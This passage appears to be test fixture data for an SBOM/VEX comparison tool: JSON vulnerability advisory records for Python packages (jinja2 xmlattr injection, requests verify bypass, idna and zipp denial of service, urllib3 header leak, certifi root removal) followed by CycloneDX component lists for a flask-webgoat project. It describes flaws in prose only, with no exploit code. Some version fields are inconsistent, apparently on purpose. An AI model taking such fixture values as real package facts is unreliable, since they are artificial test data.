to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix."}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}, "references": [{"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}], "title": "CVE-2024-22195/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-34064"]}], "cve": "CVE-2024-34064", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-05-06T14:20:59", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-34064"}, {"system_name": "GitHub Advisory", "text": "GHSA-h75v-3vvj-5mfj"}], "notes": [{"category": "description", "details": 
"Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}, {"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. 
Accepting _values_ as user input continues to be safe."}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}], "title": "CVE-2024-34064/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-35195"]}], "cve": "CVE-2024-35195", "cwe": {"id": "670", "name": "Always-Incorrect Control Flow Implementation"}, "discovery_date": "2024-05-20T20:15:00", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-35195"}, {"system_name": "GitHub Advisory", "text": "GHSA-9wx4-h78v-vm56"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "Requests `Session` object does not verify requests after making first request with verify=False"}, {"category": "details", "details": "Vulnerability Details", "text": "# Requests `Session` object does not verify requests after making first request with verify=False When making requests through a Requests `Session`, if the first request is made with `verify=False` to disable 
cert verification, all subsequent requests to the same origin will continue to ignore cert verification regardless of changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool. ### Remediation Any of these options can be used to remediate the current issue, we highly recommend upgrading as the preferred mitigation. * Upgrade to `requests>=2.32.0`. * For `requests<2.32.0`, avoid setting `verify=False` for the first request to a host while using a Requests Session. * For `requests<2.32.0`, call `close()` on `Session` objects to clear existing connections if `verify=False` is used. ### Related Links * https://github.com/psf/requests/pull/6655"}], "product_status": {"known_affected": ["requests@vers:pypi/>=0.0.0|<2.32.0"], "known_not_affected": ["requests@2.32.0"]}, "references": [{"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": 
"https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.6, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.6, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["requests@vers:pypi/>=0.0.0|<2.32.0"]}], "title": "CVE-2024-35195/pkg:pypi/requests@2.31.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-3651"]}], "cve": "CVE-2024-3651", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-04-11T21:32:40", "ids": [{"system_name": "Huntr Advisory", "text": "93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"system_name": "CVE Record", "text": "CVE-2024-3651"}, {"system_name": "GitHub Advisory", "text": "GHSA-jjg7-2v4v-x38h"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2024-60"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode"}, {"category": "details", "details": "Vulnerability Details", "text": "# Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode ### Impact A specially crafted argument to the `idna.encode()` function could consume 
significant resources. This may lead to a denial-of-service. ### Patches The function has been refined to reject such strings without the associated resource consumption in version 3.7. ### Workarounds Domain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application. ### References * https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb ## Related CVE(s) CVE-2024-3651, PYSEC-2024-60"}], "product_status": {"known_affected": ["idna@vers:pypi/>=0.1|<=3.6"]}, "references": [{"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}, {"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}, {"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", 
"environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["idna@vers:pypi/>=0.1|<=3.6"]}], "title": "CVE-2024-3651/pkg:pypi/idna@3.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-37891"]}], "cve": "CVE-2024-37891", "cwe": {"id": "669", "name": "Incorrect Resource Transfer Between Spheres"}, "discovery_date": "2024-06-17T21:37:20", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-37891"}, {"system_name": "GitHub Advisory", "text": "GHSA-34jh-p97f-mpxf"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects "}, {"category": "details", "details": "Vulnerability Details", "text": "# urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects When using urllib3's proxy support with `ProxyManager`, the `Proxy-Authorization` header is only sent to the configured proxy, as expected. However, when sending HTTP requests *without* using urllib3's proxy support, it's possible to accidentally configure the `Proxy-Authorization` header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the `Proxy-Authorization` HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects. 
Because this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the `Proxy-Authorization` header during cross-origin redirects to avoid the small chance that users are doing this on accident. Users should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the `Proxy-Authorization` header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach. ## Affected usages We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited: * Setting the `Proxy-Authorization` header without using urllib3's built-in proxy support. * Not disabling HTTP redirects. * Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin. ## Remediation * Using the `Proxy-Authorization` header with urllib3's `ProxyManager`. * Disabling HTTP redirects using `redirects=False` when sending requests. 
* Not using the `Proxy-Authorization` header."}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"], "known_not_affected": ["urllib3@2.2.2"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}, {"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}, {"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"]}], "title": "CVE-2024-37891/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-39689"]}], "cve": "CVE-2024-39689", "cwe": {"id": "345", "name": "Insufficient Verification of Data Authenticity"}, "discovery_date": "2024-07-05T20:06:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-39689"}, {"system_name": "GitHub Advisory", "text": "GHSA-248v-346w-9cwc"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "Certifi removes 
GLOBALTRUST root certificate"}, {"category": "details", "details": "Vulnerability Details", "text": "# Certifi removes GLOBALTRUST root certificate Certifi 2024.07.04 removes root certificates from \"GLOBALTRUST\" from the root store. These are in the process of being removed from Mozilla's trust store. GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified \"long-running and unresolved compliance issues\". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI)."}], "product_status": {"known_affected": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"], "known_not_affected": ["certifi@2024.07.04"]}, "references": [{"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "Google Mailing List", "url": "https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}, {"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "environmentalScore": 3.1, "environmentalSeverity": "LOW", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 3.1, "temporalSeverity": "LOW", "userInteraction": 
"REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1"}, "products": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"]}], "title": "CVE-2024-39689/pkg:pypi/certifi@2023.7.22"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-5569"]}], "cve": "CVE-2024-5569", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-07-09T00:31:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-5569"}, {"system_name": "Huntr Advisory", "text": "be898306-11f9-46b4-b28c-f4c4aa4ffbae"}], "notes": [{"category": "description", "details": "Vulnerability Description", "text": "zipp Denial of Service vulnerability"}, {"category": "details", "details": "Vulnerability Details", "text": "# zipp Denial of Service vulnerability A Denial of Service (DoS) vulnerability exists in the jaraco/zipp library, affecting all versions prior to 3.19.1. The vulnerability is triggered when processing a specially crafted zip file that leads to an infinite loop. This issue also impacts the zipfile module of CPython, as features from the third-party zipp library are later merged into CPython, and the affected code is identical in both projects. The infinite loop can be initiated through the use of functions affecting the `Path` module in both zipp and zipfile, such as `joinpath`, the overloaded division operator, and `iterdir`. Although the infinite loop is not resource exhaustive, it prevents the application from responding. 
The vulnerability was addressed in version 3.19.1 of jaraco/zipp."}], "product_status": {"known_affected": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"], "known_not_affected": ["zipp@3.19.1"]}, "references": [{"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}, {"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "products": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"]}], "title": "CVE-2024-5569/pkg:pypi/zipp@3.16.2"}]}}} \ No newline at end of file +{"result_1": {"diff_summary": {"bom_1.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}, "bom_2.json": {"components": {"libraries": [{"bom-ref": 
"pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}}, "common_summary": {"components": {"frameworks": [{"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "group": "org.springframework.cloud", "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}]}}}, "result_10": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": "flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": "flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, 
{"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": "flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library", "version": "1.5.1"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/jinja2@2.11.3", "type": "library", "version": "2.10.2"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "MarkupSafe", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], 
"purl": "pkg:pypi/markupsafe@1.1.1", "type": "library", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "itsdangerous", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/itsdangerous@1.1.0", "type": "library", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "click", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/click@7.1.2", "type": "library", "version": "7.1.2"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": "application", "version": "v2"}], "dependencies": [{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": ["pkg:pypi/markupsafe@1.1.1"], "ref": 